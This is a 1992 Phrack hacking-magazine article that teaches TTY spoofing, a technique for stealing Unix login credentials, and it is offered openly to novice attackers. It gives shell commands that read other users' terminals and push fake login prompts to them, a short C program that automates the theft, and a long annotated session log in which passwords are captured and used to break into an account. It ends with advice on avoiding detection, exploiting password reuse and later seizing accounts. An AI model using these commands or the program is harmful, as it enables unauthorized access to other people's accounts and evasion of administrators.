| ==Phrack Inc.== |
|
|
| Volume Four, Issue Forty-One, File 8 of 13 |
|
|
| ++++++++++++++++++++++++++++ |
| +++++++ +++++++ |
| +++++++ TTY SPOOFING +++++++ |
| +++++++ +++++++ |
| ++++++ BY ++++++ |
| +++++ +++++ |
| +++ VaxBuster +++ |
| ++ ++ |
| ++++++++++++++++++++++++++++ |
|
|
| July 16, 1992 |
|
|
|
|
| Please note that this file is ONLY to be distributed as part of Phrack, |
| and will NOT be distributed to any other person or magazine for release. |
|
|
| More detailed instructions have been provided so that the novice hacker is |
| able to understand them; therefore, all experienced hackers should be able to |
| breeze right through this without having to worry about the specific command |
| syntax provided. |
|
|
| On UNIX systems, there are many ways to obtain account names and |
| passwords. Some hackers prefer to swipe the password file and run programs |
| like Crack and Killer Cracker on them in order to get account names and |
| passwords. Others rely on bugs or holes in the system in order to gain root |
| access. Both these methods work, but what do you do if your password file is |
| shadowed (and it is NOT a yellow pages file!)? And what do you do if all the |
| holes have been patched over from years of previous hackers abusing them? Well, |
| I happen to have found a system where all this is true. I have even allowed |
| hackers to use one of my accounts to try to gain root privs, and of the 10 or |
| so that have tried, they have all failed. My only recourse was to find SOME |
| other way to get accounts on the system to maintain MY security. |
|
|
| TTY spoofing is often looked at as being lame, and some don't even |
| consider it a "hacking technique." People usually completely overlook it, and |
| many others don't even know about it, or know HOW to do it. I suppose I should |
| start out by defining the term. TTY spoofing is either installing a Trojan |
| horse type program to sit and watch a certain (or multiple) tty and wait for a |
| user to login. Instead of getting the normal system prompt, the program YOU |
| installed echoes the standard "login:" prompt, and then after they type in |
| their username, it prompts them for "<username> password:" and boom, you have a |
| new account. This can be done by a program or, in many cases, manually. |
|
|
| Of all the people I know, 90 percent of them scream at me saying that this |
| is impossible because their system doesn't allow read/write access to the tty. |
| When I make references to tty, I mean the physical device filename or |
| /dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters |
| (e.g., 03, pa, p4 are all valid). Of all the systems I've been on, I've never |
| seen one that doesn't allow reading/writing to a LOGIN process. See, the |
| system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND |
| PASSWORD HAS BEEN VERIFIED. Console, or ttyco, is an exception where the perms |
| are ALWAYS -rw------. |
|
|
| Now that you know WHAT tty spoofing is and the general idea behind WHY it |
| works, I'll start to tell you the many ways it can be done. |
|
|
| In order to tty spoof, you MUST have at least ONE valid account on the |
| system. You can obtain the account via a little social engineering, or you |
| could try a /who *sitename in the IRC to get nicknames and use their username |
| and try to hack out the password. Try looking for users in #hottub and other |
| st00pid channels because they are the ones who would tend to have the easy |
| passwords. Or use any other method that you can think of to obtain an account. |
|
|
| Once you have an account, the rest is the easy part. Simply create a |
| script in vi or emacs that redirects input from UNUSED tty's to cat. Since you |
| are cat's standard output, everything coming FROM the monitored tty will come |
| to your screen. You probably want to watch about 10 or 15 terminals. An |
| example script would be: |
| cat </dev/tty01& |
| cat </dev/tty02& |
| cat </dev/ttypa& |
| cat </dev/ttyp1& |
|
|
| Then you want to just run your script with source. Once a user walks up |
| to a terminal (or remotely logs in via telnet, etc.), they will try to press |
| return and attempt to get a login prompt. Many users will also type their |
| username, thinking that the system is just waiting for it. Make sure you write |
| down the username. After a while, they will probably start pressing control |
| characters, like control-d or z or whatever. Here's the problem: when CAT |
| encounters the ^D, it thinks that it is receiving an EOF in the file and it |
| thinks its job is done. You'll get something to the effect of: |
|
|
| [2] Exit DONE cat </dev/tty01 |
|
|
| or |
|
|
| [2] Exit 1 cat:i/o error cat </dev/tty01 |
|
|
| You want to IMMEDIATELY (if not sooner) "recat" that terminal. Once you get |
| that DONE signal, you now know WHAT terminal is active. You want to then type |
| something to the effect of 'echo -n "login:" >/dev/tty01&'. The & is important |
| because if the user decided to switch terminals, echo could lock up and freeze |
| your control on the account. If after about 10 seconds echo doesn't come back |
| as: |
|
|
| [5] Exit DONE echo -n login: >/dev/tty01 |
|
|
| KILL the process. When you ran the echo command, the shell gave you a |
| processid. Just type KILL processid. If the done echo line DOES come back, |
| that means that it was successfully printed on the user's screen. He will then |
| type in his username. WRITE THIS DOWN. If you are ever in doubt that the word |
| on your screen is a username, type 'grep word /etc/passwd' and if a line comes |
| up, you know it's valid. If grep doesn't return anything, still keep it |
| because it might be a password. Then wait about 2 seconds, and type |
| 'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent |
| lockage. If that command doesn't come back in about 10 seconds, kill the |
| process off and you can assume that you lost the user (e.g. he moved to another |
| terminal). If the done echo line DOES come back, then in about 2 seconds, you |
| SHOULD see his password come up. If you do, write it down, and boom, you have |
| a new account. |
|
|
| This may seem like a time consuming process and a lot of work, but |
| considering that if you have macros with the "cat </dev/tty" command and the |
| echo -n commands preset, it will be a breeze. Okay - so you say to yourself, |
| "I'm a lazy shit, and just want passwords to be handed to me on a silver |
| platter." With a little bit of work, you can do that! Below is a few lines of |
| C source code that can be used to automate this process. Anyone who knows C |
| should be able to put something together in no time. |
|
|
| #include <stdio.h> |
|
|
| FILE *fp, *fp2; |
| char username[10], password[10]; |
|
|
| main() |
| { |
| fp=fopen("/dev/ttyp1", "r"); |
| fp2=fopen("/dev/ttyp1", "w"); |
|
|
| fprintf(fp2, "login:"); |
| fscanf(fp, "%s", &username); |
|
|
| /* Put delay commands in here */ |
|
|
| fprintf(fp2, "%s password:", username); |
| fscanf(fp, "%s", @password); |
|
|
| printf("Your new account info is %s, with password %s.", username, |
| password); |
| } |
|
|
| This is a VERY basic setup. One could fairly easily have the program take |
| arguments from the command line, like a range of tty's, and have the output |
| sent to a file. |
|
|
| Below is an actual session of manual tty spoofing. The usernames and |
| passwords HAVE been changed because they will probably be active when you read |
| this. Some c/r's and l/f's have been cut to save space. Please notice the |
| time between the startup and getting a new account is only seven minutes. |
| Using this technique does not limit the hacked passwords to dictionary |
| derivatives like Crack and other programs. |
|
|
| source mycats ; This file contains cats |
| ; for terminals tty03 - tty10 |
| [1] 29377 |
| /dev/tty03: Permission denied ; All this means is that someone is logged |
| in |
| ; and has their mesg set to NO. Ignore it. |
|
|
| [1] Exit 1 cat < /dev/tty03 |
| [2] 29378 |
| [3] 29379 |
| /dev/tty06: Permission denied |
| /dev/tty05: Permission denied |
| [4] Exit 1 cat < /dev/tty06 |
| [3] Exit 1 cat < /dev/tty05 |
| /dev/tty07: Permission denied |
| [3] Exit 1 cat < /dev/tty07 |
| /dev/tty08: Permission denied |
| [3] Exit 1 cat < /dev/tty08 |
| [2] + Stopped (tty input) cat < /dev/tty04 ;This was the terminal I |
| was |
| ;on - it's automatically |
| ;aborted... |
| [3] 29383 |
| <5:34pm><~> /dev/tty09: Permission denied |
| [3] Exit 1 cat < /dev/tty09 |
| <5:34pm><~> source mycats2 ;This one contains 34 - 43 |
|
|
| [3] 29393 |
| [4] 29394 |
| [5] 29395 |
| [6] 29396 |
| [7] 29397 |
| [8] 29398 |
| [9] 29399 |
| /dev/tty36: Permission denied |
| /dev/tty37: Permission denied |
| /dev/tty38: Permission denied |
| /dev/tty39: Permission denied |
| /dev/tty40: Permission denied |
| /dev/tty34: Permission denied |
| /dev/tty35: Permission denied |
|
|
| [9] Exit 1 cat < /dev/tty40 |
| [8] Exit 1 cat < /dev/tty39 |
| [7] Exit 1 cat < /dev/tty38 |
| [6] Exit 1 cat < /dev/tty37 |
| [5] Exit 1 cat < /dev/tty36 |
| [4] Exit 1 cat < /dev/tty35 |
| [3] Exit 1 cat < /dev/tty34 |
|
|
| [1] 29400 |
| [3] 29401 |
| [4] 29402 |
|
|
| <5:34pm><~> /dev/tty41: Permission denied |
|
|
| [1] Exit 1 cat < /dev/tty41 |
| /dev/tty43: Permission denied |
| [4] Exit 1 cat < /dev/tty43 |
| /dev/tty42: Permission denied |
| [3] Exit 1 cat < /dev/tty42 |
|
|
| <5:34pm><~> source mycats3 ;This contains p1-pa |
|
|
| [3] 29404 |
| [4] 29405 |
| [5] 29406 |
| [6] 29407 |
| [7] 29408 |
| /dev/ttyp1: Permission denied |
| /dev/ttyp3: Permission denied |
| /dev/ttyp5: Permission denied |
| /dev/ttyp6: Permission denied |
|
|
| [8] Exit 1 cat < /dev/ttyp6 |
| [7] Exit 1 cat < /dev/ttyp5 |
| [5] Exit 1 cat < /dev/ttyp3 |
| [3] Exit 1 cat < /dev/ttyp1 |
| [7] 29410 |
| [8] 29411 |
| [9] 29412 |
| [1] 29413 |
|
|
| <5:34pm><~> /dev/ttyp7: Permission denied |
|
|
| [7] Exit 1 cat < /dev/ttyp7 |
| /dev/ttypa: Permission denied |
| [1] Exit 1 cat < /dev/ttypa |
|
|
| <5:34pm><~> source mycats4 ;Last one is q0-qa |
|
|
| [1] 29426 |
| [3] 29427 |
| [5] 29428 |
| [7] 29429 |
| [10] 29430 |
| [11] 29431 |
| /dev/ttyq5: Permission denied |
|
|
| [10] Exit 1 cat < /dev/ttyq5 |
| [12] 29432 |
| [10] 29433 |
| [13] 29434 |
| [14] 29435 |
| <5:34pm><~> who |
|
|
| <5:34pm><~> nnnnnnnnrlogin unx ; He thought he didn't type it right. |
| pigsnort ; Important! Write down ALL non- |
| ; system sent messages! |
| <5:35pm><~> |
| grep pigsnort /etc/passwd ; Check with grep to see if it's an |
| ; account. |
|
|
| <5:35pm><~> ; Didn't return anything - must be a |
| ; a password! |
|
|
| nnnpptst8 ; Sure looks like an account name to |
| nnnnn===== ; me! Write it down! |
|
|
| ls |
|
|
| [8] Done cat < /dev/ttyp8 ; Asshole pressed control-d. |
| ; 'recat' the terminal! |
|
|
| <5:36pm><~> cat < /d e v/ ttyp8& ; This is the 'recat.' |
|
|
| [8] 29459 |
| <5:36pm><~> cat: read error: I/O error ; Asshole is now trying all |
| ; sorts of control characters |
| ; sending UNIX into a fit. |
| [4] Exit 1 cat < /dev/ttyp2 |
|
|
| <5:36pm><~> cat </dev/ttyp2& ; 'recat' it! |
|
|
| [4] 29465 |
| <5:36pm><~> |
|
|
| <5:36pm><~> |
|
|
| [6] Done cat < /dev/ttyp4 ; Someone had to press the |
| ; character, so this is active. |
|
|
| <5:36pm><~> cat </dev/ttyp4& ; 'recat' the ctrl-d. |
|
|
| [6] 29468 |
| <5:36pm><~> echo -n "login:" >/dev/ttyble1 ; Try echo'ing a fake login |
| cat: read error: I/O error ; to the active terminal. |
|
|
| [6] Exit 1 cat < /dev/ttyp4 |
| poop4d ; Here goes another password. |
| p4 ; Couldn't find the matching |
| & ; account. |
|
|
| [6] 29470 |
| <5:37pm><~> cat: read error: I/O error |
|
|
|
|
| [4] Exit 1 cat < /dev/ttyp2 |
|
|
|
|
| <5:37pm><~> cat </dev/ttyp2& |
|
|
| [4] 29489 |
| <5:37pm><~> echo -n "login:" >/dev/ttyp2& ; Try echo'ing a fake login |
| ; prompt again. |
| [15] 29490 |
| <5:37pm><~> kill 29490 ; Login prompt didn't return |
| ; within a few seconds so we |
| ; kill it. |
|
|
| [15] Terminated echo -n login: > /dev/ttyp2 |
| <5:37pm><~> cat </dev/tty |
| echo -n "login:" >/dev/ttyp4& |
|
|
| [15] 29491 |
| <5:38pm><~> kill 29491 |
|
|
| <5:38pm><~> grep pptst8 /etc/passwd ; Make sure it's an account! |
|
|
| pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash |
| <5:38pm><~> grep ble1 /etc/passwd ; This isn't an account... |
|
|
| <5:39pm><~> grep poop4d /etc/passwd ; Neither is this - probably |
| ; a password... |
|
|
| <5:39pm><~> who ; See if any of the users we |
| ; caught fell through an |
| ; 'uncatted' terminal... |
|
|
| <5:39pm><~> ps -x ; View all our processes. |
| ; DAMN glad that the cat's |
| PID TT STAT TIME COMMAND ; don't come up in the process |
| 29266 04 S 0:04 -tcsh (tcsh) ; list! |
| 29378 04 T 0:00 cat |
| 29412 04 I 0:00 -tcsh (tcsh) |
| 29426 04 I 0:00 -tcsh (tcsh) |
| 29427 04 I 0:00 -tcsh (tcsh) |
| 29428 04 I 0:00 -tcsh (tcsh) |
| 29429 04 I 0:00 -tcsh (tcsh) |
| 29431 04 I 0:00 -tcsh (tcsh) |
| 29432 04 I 0:00 -tcsh (tcsh) |
| 29433 04 I 0:00 -tcsh (tcsh) |
| 29434 04 I 0:00 -tcsh (tcsh) |
| 29435 04 I 0:00 -tcsh (tcsh) |
| 29459 04 I 0:00 -tcsh (tcsh) |
| 29470 04 D 0:00 <exiting> |
| 29489 04 I 0:00 -tcsh (tcsh) |
| 29491 04 D 0:00 -tcsh (tcsh) |
| 29547 04 R 0:00 ps -x |
| <5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29 |
|
|
| 435 29459 29470 29489 289491 ;Kill off all processes. |
|
|
| 29470: No such process |
|
|
| [4] Terminated cat < /dev/ttyp2 |
| [8] Terminated cat < /dev/ttyp8 |
| [14] Terminated cat < /dev/ttyqa |
| [13] Terminated cat < /dev/ttyq9 |
| [10] Terminated cat < /dev/ttyq8 |
| [12] Terminated cat < /dev/ttyq7 |
| [11] Terminated cat < /dev/ttyq6 |
| [7] Terminated cat < /dev/ttyq4 |
| [5] Terminated cat < /dev/ttyq3 |
| [3] Terminated cat < /dev/ttyq2 |
| [1] Terminated cat < /dev/ttyq1 |
| [9] Terminated cat < /dev/ttyp9 |
| [2] Terminated cat < /dev/tty04 |
|
|
| <5:41pm><~> |
|
|
| [15] Terminated echo -n login: > /dev/ttyp4 |
| [6] Done echo -n login: > /dev/ttyp4 |
|
|
| <5:41pm><~> ps -x |
|
|
| PID TT STAT TIME COMMAND |
| 29266 04 S 0:04 -tcsh (tcsh) |
| 29594 04 R 0:00 ps -x |
| <5:41pm><~> logout |
|
|
| Local -011- Session 1 disconnected from UNIX1 |
|
|
| Local> c unx ; Notice it's a different |
| ; system but shares passwords. |
| Local -010- Session 1 to UNX on node MYUNX established |
|
|
| Welcome to ucuc.edu. |
|
|
| login: ble1 ; Test out all the accounts |
| ble1 password: [I tried poop4d] ; with all the passwords. |
| Login failed. |
| login: pptst8 |
| pptst8 password: [I tried poop4d here too.] |
| Login failed. |
| login: pptst8 |
| pptst8 password: [I typed pigsnort] |
| Authenticated via AFS Kerberos. ; BINGO! We're in! |
| Checking system rights for <pptst8>... login permitted. |
| login 1.0(2), Authen |
| Last login: Fri Jul 17 17:33:30 on tty11 |
|
|
| (1) unix $ ls ; Let's see what this sucker |
| ; has...hmm...an IRC user, eh? |
| Mail Mailbox News bin irc other junk private |
| public |
| (2) unix $ logout |
|
|
| Local -011- Session 1 disconnected from UNX |
|
|
| A few words of advice: Monitor the tty's when it's the busiest time of |
| the day, usually about 11am on a university system. Kill all your processes |
| before you hang up. Those processes that you run will sit on the system and |
| can be found by sysadmins. Also, they will tie up those tty's that you are |
| monitoring, which can also cause problems. Point is, you DON'T want to attract |
| attention to what you're doing. Don't test the accounts you get immediately. |
| If the victim happens to be doing a 'who' and sees two of himself, he is going |
| to shit. Wait until later or use a different subsystem that won't show up on |
| his 'who'. |
|
|
| Don't take over accounts. All the real user has to do is call up the office |
| and tell them that their password was changed. In two seconds, it'll be |
| changed back, plus the sysadmin will be on the lookout so you're just one step |
| BEHIND where you started. Once you have someone's account info, kill the cat |
| that is sucking the terminal so that the user can log in normally. If he |
| continues not to get ANYTHING, he may go and solicit some "professional" help, |
| and THEY might know what's going on, so let the sucker log in. Another thing: |
| with accounts you get. |
|
|
| DO NOT DESTROY ANYTHING in the system, not in their account, and no where else |
| if you get higher privs. Chances are that the person is NOT going to know |
| someone has obtained their password, and will have NO reason to change it. |
| Wait until his college term/semester ends and then monitor the file dates. If |
| after about a month the dates don't change, change the password and do whatever |
| you want to the account because he's probably done with it. |
|
|
| Oh and one last thing. Once you have a valid account, grep the username and |
| get the REAL name. Then grep the REAL name and find out all accounts on the |
| system that the guy owns. Chances are that he is using the same password in |
| multiple accounts! |
|
|
| Thanks go to Pointman, #hack members, and the entire current/past Phrack staff |
| for putting out an excellent magazine over the years. |
|
|
| If you need to contact me, try the IRC in #hack and the VMB world. I usually |
| prefer NOT to be contacted by e-mail, but if you have my address and have an |
| important question, go for it. I'm willing to help any beginners who need it. |
|
|
| Happy Hacking! |
|
|
| VaxBuster '92 |
|
|